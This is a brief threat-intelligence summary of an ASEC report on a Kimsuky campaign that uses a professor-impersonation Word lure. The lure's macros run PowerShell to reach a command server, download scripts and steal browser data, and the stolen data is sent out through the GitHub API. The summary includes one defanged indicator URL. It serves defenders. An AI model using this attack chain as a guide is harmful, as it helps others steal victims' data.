ASEC reports a Kimsuky campaign that impersonated a professor and emailed a password-protected Word document disguised as a biography/profile form. When macros were enabled, the document used PowerShell to contact C2, download additional scripts, and run malware consistent with earlier news-survey lure activity that steals browser-stored information. This variant changed its exfiltration method from FTP to the GitHub API, uploading suspected victim data to a specific repository. ASEC lists detections for the DOC downloader and PowerShell file-upload component and provides representative indicators including hxxp://hmcks.realma.r-e[.]kr/gl/ee.txt.